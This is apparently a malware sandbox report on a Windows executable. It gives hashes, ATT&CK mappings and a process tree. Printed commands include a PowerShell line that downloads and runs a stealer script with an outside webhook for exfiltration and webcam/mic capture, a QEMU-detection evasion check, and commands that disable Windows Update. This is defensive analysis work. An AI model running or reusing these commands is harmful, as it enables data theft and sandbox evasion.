5e8e260bc0d6b53773465406ef57cdb5db590da90a631c1fdd338a7c2e8a047b

Analysis

max time kernel
112s
max time network
119s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
25-08-2024 10:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6a59d71155aac8519594c7cc73ddb780N.exe
Size

88KB
MD5

6a59d71155aac8519594c7cc73ddb780
SHA1

4fa2332e79c76bc9fd2fe36de05213a9843a365b
SHA256

5e8e260bc0d6b53773465406ef57cdb5db590da90a631c1fdd338a7c2e8a047b
SHA512

b6cee69db1692cd14a7fc57b3fa0360321222b4c73f44b6554246d36fea4c20494408a62bd86ba2fe550219fa45db3c83b2b8115ed7a2354f76876cf7bb3ef8e
SSDEEP

1536:SI3e7O9I0NTxT4fG9afQZAfUBt7NUAewtB2OozjO28ZtMnP4LpX1clZHzXrPTF:j3UEI0NTxTMfQ+u7NUAewtMO+i28TMQg

Score

10^/10

lateral_movement

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://information-pricing.gl.at.ply.gg:12301/data

Signatures

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

8 2588 powershell.exe
10 2588 powershell.exe

flow	pid	process
8	2588	powershell.exe
10	2588	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

6a59d71155aac8519594c7cc73ddb780N.exemshta.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	6a59d71155aac8519594c7cc73ddb780N.exe
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	mshta.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

9 raw.githubusercontent.com
10 raw.githubusercontent.com

flow	ioc
9	raw.githubusercontent.com
10	raw.githubusercontent.com

Maps connected drives based on registry 3 TTPs 6 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

reg.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	reg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count	reg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\NextInstance	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	reg.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	reg.exe
Key value enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	reg.exe

Remote Services: SMB/Windows Admin Shares 1 TTPs 1 IoCs
Adversaries may use Valid Accounts to interact with a remote network share using Server Message Block (SMB).
lateral_movement

SMB/Windows Admin Shares
T1021.002

Processes:

reg.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\LanmanServer\Parameters\NullSessionPipes reg.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

2876 taskkill.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\LanmanServer\Parameters\NullSessionPipes	reg.exe

pid	process
2876	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\GameBar	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\GameBar\AutoGameModeEnabled = "0"	reg.exe

Runs net.exe
Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

powershell.exepowershell.exe

pid process

8 powershell.exe
8 powershell.exe
2588 powershell.exe
2588 powershell.exe
2588 powershell.exe
2588 powershell.exe
2588 powershell.exe

pid	process
8	powershell.exe
8	powershell.exe
2588	powershell.exe
2588	powershell.exe
2588	powershell.exe
2588	powershell.exe
2588	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

taskkill.exeWMIC.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	2876	taskkill.exe
Token: SeIncreaseQuotaPrivilege	3420	WMIC.exe
Token: SeSecurityPrivilege	3420	WMIC.exe
Token: SeTakeOwnershipPrivilege	3420	WMIC.exe
Token: SeLoadDriverPrivilege	3420	WMIC.exe
Token: SeSystemProfilePrivilege	3420	WMIC.exe
Token: SeSystemtimePrivilege	3420	WMIC.exe
Token: SeProfSingleProcessPrivilege	3420	WMIC.exe
Token: SeIncBasePriorityPrivilege	3420	WMIC.exe
Token: SeCreatePagefilePrivilege	3420	WMIC.exe
Token: SeBackupPrivilege	3420	WMIC.exe
Token: SeRestorePrivilege	3420	WMIC.exe
Token: SeShutdownPrivilege	3420	WMIC.exe
Token: SeDebugPrivilege	3420	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3420	WMIC.exe
Token: SeRemoteShutdownPrivilege	3420	WMIC.exe
Token: SeUndockPrivilege	3420	WMIC.exe
Token: SeManageVolumePrivilege	3420	WMIC.exe
Token: 33	3420	WMIC.exe
Token: 34	3420	WMIC.exe
Token: 35	3420	WMIC.exe
Token: 36	3420	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3420	WMIC.exe
Token: SeSecurityPrivilege	3420	WMIC.exe
Token: SeTakeOwnershipPrivilege	3420	WMIC.exe
Token: SeLoadDriverPrivilege	3420	WMIC.exe
Token: SeSystemProfilePrivilege	3420	WMIC.exe
Token: SeSystemtimePrivilege	3420	WMIC.exe
Token: SeProfSingleProcessPrivilege	3420	WMIC.exe
Token: SeIncBasePriorityPrivilege	3420	WMIC.exe
Token: SeCreatePagefilePrivilege	3420	WMIC.exe
Token: SeBackupPrivilege	3420	WMIC.exe
Token: SeRestorePrivilege	3420	WMIC.exe
Token: SeShutdownPrivilege	3420	WMIC.exe
Token: SeDebugPrivilege	3420	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3420	WMIC.exe
Token: SeRemoteShutdownPrivilege	3420	WMIC.exe
Token: SeUndockPrivilege	3420	WMIC.exe
Token: SeManageVolumePrivilege	3420	WMIC.exe
Token: 33	3420	WMIC.exe
Token: 34	3420	WMIC.exe
Token: 35	3420	WMIC.exe
Token: 36	3420	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4084	WMIC.exe
Token: SeSecurityPrivilege	4084	WMIC.exe
Token: SeTakeOwnershipPrivilege	4084	WMIC.exe
Token: SeLoadDriverPrivilege	4084	WMIC.exe
Token: SeSystemProfilePrivilege	4084	WMIC.exe
Token: SeSystemtimePrivilege	4084	WMIC.exe
Token: SeProfSingleProcessPrivilege	4084	WMIC.exe
Token: SeIncBasePriorityPrivilege	4084	WMIC.exe
Token: SeCreatePagefilePrivilege	4084	WMIC.exe
Token: SeBackupPrivilege	4084	WMIC.exe
Token: SeRestorePrivilege	4084	WMIC.exe
Token: SeShutdownPrivilege	4084	WMIC.exe
Token: SeDebugPrivilege	4084	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4084	WMIC.exe
Token: SeRemoteShutdownPrivilege	4084	WMIC.exe
Token: SeUndockPrivilege	4084	WMIC.exe
Token: SeManageVolumePrivilege	4084	WMIC.exe
Token: 33	4084	WMIC.exe
Token: 34	4084	WMIC.exe
Token: 35	4084	WMIC.exe
Token: 36	4084	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

6a59d71155aac8519594c7cc73ddb780N.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exenet.exe

description	pid	process	target process
PID 1824 wrote to memory of 4272	1824	6a59d71155aac8519594c7cc73ddb780N.exe	cmd.exe
PID 1824 wrote to memory of 4272	1824	6a59d71155aac8519594c7cc73ddb780N.exe	cmd.exe
PID 1824 wrote to memory of 4048	1824	6a59d71155aac8519594c7cc73ddb780N.exe	cmd.exe
PID 1824 wrote to memory of 4048	1824	6a59d71155aac8519594c7cc73ddb780N.exe	cmd.exe
PID 1824 wrote to memory of 4344	1824	6a59d71155aac8519594c7cc73ddb780N.exe	cmd.exe
PID 1824 wrote to memory of 4344	1824	6a59d71155aac8519594c7cc73ddb780N.exe	cmd.exe
PID 1824 wrote to memory of 4104	1824	6a59d71155aac8519594c7cc73ddb780N.exe	cmd.exe
PID 1824 wrote to memory of 4104	1824	6a59d71155aac8519594c7cc73ddb780N.exe	cmd.exe
PID 1824 wrote to memory of 1096	1824	6a59d71155aac8519594c7cc73ddb780N.exe	cmd.exe
PID 1824 wrote to memory of 1096	1824	6a59d71155aac8519594c7cc73ddb780N.exe	cmd.exe
PID 1824 wrote to memory of 3040	1824	6a59d71155aac8519594c7cc73ddb780N.exe	cmd.exe
PID 1824 wrote to memory of 3040	1824	6a59d71155aac8519594c7cc73ddb780N.exe	cmd.exe
PID 1824 wrote to memory of 4092	1824	6a59d71155aac8519594c7cc73ddb780N.exe	cmd.exe
PID 1824 wrote to memory of 4092	1824	6a59d71155aac8519594c7cc73ddb780N.exe	cmd.exe
PID 1824 wrote to memory of 2004	1824	6a59d71155aac8519594c7cc73ddb780N.exe	cmd.exe
PID 1824 wrote to memory of 2004	1824	6a59d71155aac8519594c7cc73ddb780N.exe	cmd.exe
PID 1824 wrote to memory of 2560	1824	6a59d71155aac8519594c7cc73ddb780N.exe	cmd.exe
PID 1824 wrote to memory of 2560	1824	6a59d71155aac8519594c7cc73ddb780N.exe	cmd.exe
PID 1824 wrote to memory of 1292	1824	6a59d71155aac8519594c7cc73ddb780N.exe	cmd.exe
PID 1824 wrote to memory of 1292	1824	6a59d71155aac8519594c7cc73ddb780N.exe	cmd.exe
PID 4272 wrote to memory of 3288	4272	cmd.exe	findstr.exe
PID 4272 wrote to memory of 3288	4272	cmd.exe	findstr.exe
PID 4048 wrote to memory of 2876	4048	cmd.exe	taskkill.exe
PID 4048 wrote to memory of 2876	4048	cmd.exe	taskkill.exe
PID 3040 wrote to memory of 368	3040	cmd.exe	cmd.exe
PID 3040 wrote to memory of 368	3040	cmd.exe	cmd.exe
PID 368 wrote to memory of 3420	368	cmd.exe	WMIC.exe
PID 368 wrote to memory of 3420	368	cmd.exe	WMIC.exe
PID 368 wrote to memory of 1240	368	cmd.exe	findstr.exe
PID 368 wrote to memory of 1240	368	cmd.exe	findstr.exe
PID 4344 wrote to memory of 2184	4344	cmd.exe	cmd.exe
PID 4344 wrote to memory of 2184	4344	cmd.exe	cmd.exe
PID 2184 wrote to memory of 3576	2184	cmd.exe	reg.exe
PID 2184 wrote to memory of 3576	2184	cmd.exe	reg.exe
PID 2184 wrote to memory of 1648	2184	cmd.exe	findstr.exe
PID 2184 wrote to memory of 1648	2184	cmd.exe	findstr.exe
PID 4092 wrote to memory of 4208	4092	cmd.exe	reg.exe
PID 4092 wrote to memory of 4208	4092	cmd.exe	reg.exe
PID 2560 wrote to memory of 2948	2560	cmd.exe	cmd.exe
PID 2560 wrote to memory of 2948	2560	cmd.exe	cmd.exe
PID 2948 wrote to memory of 4084	2948	cmd.exe	WMIC.exe
PID 2948 wrote to memory of 4084	2948	cmd.exe	WMIC.exe
PID 2948 wrote to memory of 3852	2948	cmd.exe	findstr.exe
PID 2948 wrote to memory of 3852	2948	cmd.exe	findstr.exe
PID 4272 wrote to memory of 8	4272	cmd.exe	powershell.exe
PID 4272 wrote to memory of 8	4272	cmd.exe	powershell.exe
PID 4092 wrote to memory of 4708	4092	cmd.exe	reg.exe
PID 4092 wrote to memory of 4708	4092	cmd.exe	reg.exe
PID 2560 wrote to memory of 4856	2560	cmd.exe	reg.exe
PID 2560 wrote to memory of 4856	2560	cmd.exe	reg.exe
PID 4092 wrote to memory of 3572	4092	cmd.exe	reg.exe
PID 4092 wrote to memory of 3572	4092	cmd.exe	reg.exe
PID 4048 wrote to memory of 1416	4048	cmd.exe	net.exe
PID 4048 wrote to memory of 1416	4048	cmd.exe	net.exe
PID 1416 wrote to memory of 736	1416	net.exe	net1.exe
PID 1416 wrote to memory of 736	1416	net.exe	net1.exe
PID 2560 wrote to memory of 3356	2560	cmd.exe	reg.exe
PID 2560 wrote to memory of 3356	2560	cmd.exe	reg.exe
PID 4092 wrote to memory of 4264	4092	cmd.exe	reg.exe
PID 4092 wrote to memory of 4264	4092	cmd.exe	reg.exe
PID 2560 wrote to memory of 4224	2560	cmd.exe	reg.exe
PID 2560 wrote to memory of 4224	2560	cmd.exe	reg.exe
PID 4092 wrote to memory of 4704	4092	cmd.exe	reg.exe
PID 4092 wrote to memory of 4704	4092	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\6a59d71155aac8519594c7cc73ddb780N.exe
"C:\Users\Admin\AppData\Local\Temp\6a59d71155aac8519594c7cc73ddb780N.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1824

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Asdx.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:4272

C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Asdx.bat"
3⤵
PID:3288

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "$d = wmic diskdrive get model;if ($d -like '*DADY HARDDISK*' -or $d -like '*QEMU HARDDISK*') { taskkill /f /im cmd.exe }"
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:8

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" diskdrive get model
4⤵
PID:4916

C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Asdx.bat"
3⤵
PID:2196

C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Asdx.bat"
3⤵
PID:820

C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Asdx.bat"
3⤵
PID:2908

C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Asdx.bat"
3⤵
PID:4436

C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Asdx.bat"
3⤵
PID:2616

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
3⤵
PID:4428

C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get manufacturer /value
4⤵
PID:4800

C:\Windows\system32\chcp.com
chcp 65001
3⤵
PID:1572

C:\Windows\system32\net.exe
net session
3⤵
PID:4980

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
4⤵
PID:2968

C:\Windows\system32\mshta.exe
mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$webhook = 'h' + 'ttps://information-pricing.gl.at.ply.gg:12301/data';$debug=$false;$vm_protect=$true;$encryption_key = 'YOUR_ENC_KEY_HERE';$blockhostsfile=$false;$criticalprocess=$false;$melt=$false;$fakeerror=$false;$persistence=$false;$write_disk_only = $false;$record_mic=$true;$webcam=$true;Iwr -Uri 'https://github.com/Pirate-Devs/Kematian/raw/main/frontend-src/main.ps1' -USeB | iex",0))
3⤵
- Checks computer location settings
PID:4292

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ProgressPreference = 'SilentlyContinue';$webhook = 'h' + 'ttps://information-pricing.gl.at.ply.gg:12301/data';$debug=$false;$vm_protect=$true;$encryption_key = 'YOUR_ENC_KEY_HERE';$blockhostsfile=$false;$criticalprocess=$false;$melt=$false;$fakeerror=$false;$persistence=$false;$write_disk_only = $false;$record_mic=$true;$webcam=$true;Iwr -Uri 'https://github.com/Pirate-Devs/Kematian/raw/main/frontend-src/main.ps1' -USeB | iex
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:2588

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Oarqktdeqje.cmd" "
2⤵
- Suspicious use of WriteProcessMemory
PID:4048

C:\Windows\system32\taskkill.exe
taskkill -F -FI "IMAGENAME eq SystemSettings.exe"
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2876

C:\Windows\system32\net.exe
net stop wuauserv
3⤵
- Suspicious use of WriteProcessMemory
PID:1416

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop wuauserv
4⤵
PID:736

C:\Windows\system32\net.exe
net stop UsoSvc
3⤵
PID:4604

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop UsoSvc
4⤵
PID:4008

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "DoNotConnectToWindowsUpdateInternetLocations" /t REG_DWORD /d "1" /f
3⤵
PID:1544

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "SetDisableUXWUAccess" /t REG_DWORD /d "1" /f
3⤵
PID:3408

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoUpdate" /t REG_DWORD /d "1" /f
3⤵
PID:2624

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "ExcludeWUDriversInQualityUpdate" /t REG_DWORD /d "1" /f
3⤵
PID:4892

C:\Windows\system32\gpupdate.exe
gpupdate /force
3⤵
PID:776

C:\Windows\system32\net.exe
net start wuauserv
3⤵
PID:1520

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start wuauserv
4⤵
PID:3876

C:\Windows\system32\net.exe
net start UsoSvc
3⤵
PID:3224

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start UsoSvc
4⤵
PID:8

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Jdgot.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:4344

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG QUERY "HKLM\SYSTEM\CurrentControlSet\Services" /S /F "EnableHIPM"| FINDSTR /V "EnableHIPM"
3⤵
- Suspicious use of WriteProcessMemory
PID:2184

C:\Windows\system32\reg.exe
REG QUERY "HKLM\SYSTEM\CurrentControlSet\Services" /S /F "EnableHIPM"
4⤵
- Maps connected drives based on registry
- Remote Services: SMB/Windows Admin Shares
PID:3576

C:\Windows\system32\findstr.exe
FINDSTR /V "EnableHIPM"
4⤵
PID:1648

C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\amdsbs\Settings\CAM" /F /V "EnableHIPM" /T REG_DWORD /d 0
3⤵
PID:2888

C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\amdsbs\Settings\CAM" /F /V "EnableDIPM" /T REG_DWORD /d 0
3⤵
PID:3688

C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\amdsbs\Settings\CAM" /F /V "EnableHDDParking" /T REG_DWORD /d 0
3⤵
PID:4780

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Ogxcvomslhkiiv.bat" "
2⤵
PID:4104

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Knwiykyutv.bat" "
2⤵
PID:1096

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Kxwy.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:3040

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c WMIC PATH Win32_USBHub GET DeviceID| FINDSTR /L "VID_"
3⤵
- Suspicious use of WriteProcessMemory
PID:368

C:\Windows\System32\Wbem\WMIC.exe
WMIC PATH Win32_USBHub GET DeviceID
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3420

C:\Windows\system32\findstr.exe
FINDSTR /L "VID_"
4⤵
PID:1240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Yqyvvmkuuac.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:4092

C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\GameBar" /v "ShowStartupPanel" /t REG_DWORD /d "0" /f
3⤵
PID:4208

C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\GameBar" /v "GamePanelStartupTipIndex" /t REG_DWORD /d "3" /f
3⤵
PID:4708

C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\GameBar" /v "AllowAutoGameMode" /t REG_DWORD /d "0" /f
3⤵
PID:3572

C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\GameBar" /v "AutoGameModeEnabled" /t REG_DWORD /d "0" /f
3⤵
PID:4264

C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\GameBar" /v "UseNexusForGameBarEnabled" /t REG_DWORD /d "0" /f
3⤵
PID:4704

C:\Windows\system32\reg.exe
reg add "HKCU\System\GameConfigStore" /v "GameDVR_Enabled" /t REG_DWORD /d "0" /f
3⤵
PID:764

C:\Windows\system32\reg.exe
reg add "HKCU\System\GameConfigStore" /v "GameDVR_FSEBehaviorMode" /t REG_DWORD /d "2" /f
3⤵
PID:5048

C:\Windows\system32\reg.exe
reg add "HKCU\System\GameConfigStore" /v "GameDVR_FSEBehavior" /t REG_DWORD /d "2" /f
3⤵
PID:4408

C:\Windows\system32\reg.exe
reg add "HKCU\System\GameConfigStore" /v "GameDVR_HonorUserFSEBehaviorMode" /t REG_DWORD /d "1" /f
3⤵
PID:4332

C:\Windows\system32\reg.exe
reg add "HKCU\System\GameConfigStore" /v "GameDVR_DXGIHonorFSEWindowsCompatible" /t REG_DWORD /d "1" /f
3⤵
PID:3080

C:\Windows\system32\reg.exe
reg add "HKCU\System\GameConfigStore" /v "GameDVR_EFSEFeatureFlags" /t REG_DWORD /d "0" /f
3⤵
PID:4596

C:\Windows\system32\reg.exe
reg add "HKCU\System\GameConfigStore" /v "GameDVR_DSEBehavior" /t REG_DWORD /d "2" /f
3⤵
PID:2212

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\PolicyManager\default\ApplicationManagement\AllowGameDVR" /v "value" /t REG_DWORD /d "0" /f
3⤵
PID:3492

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\GameDVR" /v "AllowGameDVR" /t REG_DWORD /d "0" /f
3⤵
PID:64

C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\GameDVR" /v "AppCaptureEnabled" /t REG_DWORD /d "0" /f
3⤵
PID:2276

C:\Windows\system32\reg.exe
reg add "HKU\.DEFAULT\SOFTWARE\Microsoft\GameBar" /v "AutoGameModeEnabled" /t REG_DWORD /d "0" /f
3⤵
- Modifies data under HKEY_USERS
PID:2308

C:\Windows\system32\reg.exe
reg delete "HKCU\System\GameConfigStore\Children" /f
3⤵
PID:3272

C:\Windows\system32\reg.exe
reg delete "HKCU\System\GameConfigStore\Parents" /f
3⤵
PID:1896

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Anzeciuwvz.cmd" "
2⤵
PID:2004

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Qnvidvum.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:2560

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic PATH Win32_PnPEntity GET DeviceID | findstr /l "USB\VID_"
3⤵
- Suspicious use of WriteProcessMemory
PID:2948

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_PnPEntity GET DeviceID
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4084

C:\Windows\system32\findstr.exe
findstr /l "USB\VID_"
4⤵
PID:3852

C:\Windows\system32\reg.exe
reg.exe add "HKLM\SYSTEM\ControlSet001\Enum\USB\VID_0627&PID_0001\28754-0000:00:04.0-1\Device Parameters" /v SelectiveSuspendOn /t REG_DWORD /d 00000000 /f
3⤵
PID:4856

C:\Windows\system32\reg.exe
reg.exe add "HKLM\SYSTEM\ControlSet001\Enum\USB\VID_0627&PID_0001\28754-0000:00:04.0-1\Device Parameters" /v SelectiveSuspendEnabled /t REG_BINARY /d 00 /f
3⤵
PID:3356

C:\Windows\system32\reg.exe
reg.exe add "HKLM\SYSTEM\ControlSet001\Enum\USB\VID_0627&PID_0001\28754-0000:00:04.0-1\Device Parameters" /v EnhancedPowerManagementEnabled /t REG_DWORD /d 00000000 /f
3⤵
PID:4224

C:\Windows\system32\reg.exe
reg.exe add "HKLM\SYSTEM\ControlSet001\Enum\USB\VID_0627&PID_0001\28754-0000:00:04.0-1\Device Parameters" /v AllowIdleIrpInD3 /t REG_DWORD /d 00000000 /f
3⤵
PID:2556

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic PATH Win32_USBHub GET DeviceID | findstr /l "USB\ROOT_HUB"
3⤵
PID:3708

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_USBHub GET DeviceID
4⤵
PID:1440

C:\Windows\system32\findstr.exe
findstr /l "USB\ROOT_HUB"
4⤵
PID:4684

C:\Windows\system32\reg.exe
reg.exe add "HKLM\SYSTEM\ControlSet001\Enum\USB\ROOT_HUB20\4&3104EFD0&0\Device Parameters\WDF" /v IdleInWorkingState /t REG_DWORD /d 00000000 /f
3⤵
PID:3776

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Bsxrotujomvk.cmd" "
2⤵
PID:1292

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Remote Services

T1021

SMB/Windows Admin Shares

T1021.002

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
50a8221b93fbd2628ac460dd408a9fc1

SHA1
7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

SHA256
46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

SHA512
27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\Anzeciuwvz.cmd

Filesize
239B

MD5
18449c1cf0be942485227a9a3007ae3f

SHA1
98b11fad32ee46fb9bbb2ce05ebfaa9881775b39

SHA256
92426fa49cf0d59a470bc4d7cc53b8e52489315dc449ab2a4e69539c76ce8e42

SHA512
5ab1250bc60e105fc71ab84c4866822778e8a40fda48be703be283d1acf7959933ec3024e196c8f4cb548012786f692eb210899323060f28254d3d47a7018205

Download Submit
C:\Users\Admin\AppData\Local\Temp\Asdx.bat

Filesize
110KB

MD5
ec2404051431b3f90cc6fffb92b7ea3d

SHA1
936f8e15ba81fd7d115f466023537941a81f68ea

SHA256
331d254efc7f64597e13360bae343d62f660186d62024139c3f2ab668099eac3

SHA512
891235068b0cf6c8df9c37757a94da161176ef39755c481e6aa115bab35f31d7865ab3099fcc980330291f30db0b6c65d5dbfb9cac1f94ed9e977cc878f4fa96

Download Submit
C:\Users\Admin\AppData\Local\Temp\Bsxrotujomvk.cmd

Filesize
65B

MD5
1ef5e829303a139ce967440e0cdca10c

SHA1
f0fa45906bd0f4c3668fcd0d8f68d4b298b30e5b

SHA256
98ce42deef51d40269d542f5314bef2c7468d401ad5d85168bfab4c0108f75f7

SHA512
19dc6ae12de08b21b36c1ec7f353ce9e7cef73fa4d1354c436234167f0847bc9e2b85e2f36208f773ef324e2d79e6af1beca4470e44b8672b47d077efe33a1f8

Download Submit
C:\Users\Admin\AppData\Local\Temp\Jdgot.bat

Filesize
599B

MD5
3d42a1761e2d0acca609626228706d2d

SHA1
03c4ec827c37a3930d8541eed0fc6fd6763d59e7

SHA256
ddd7bab4cfe8ddde80628e8513ad9caab5d0a08bb858a0730bc9f8fea7bc3358

SHA512
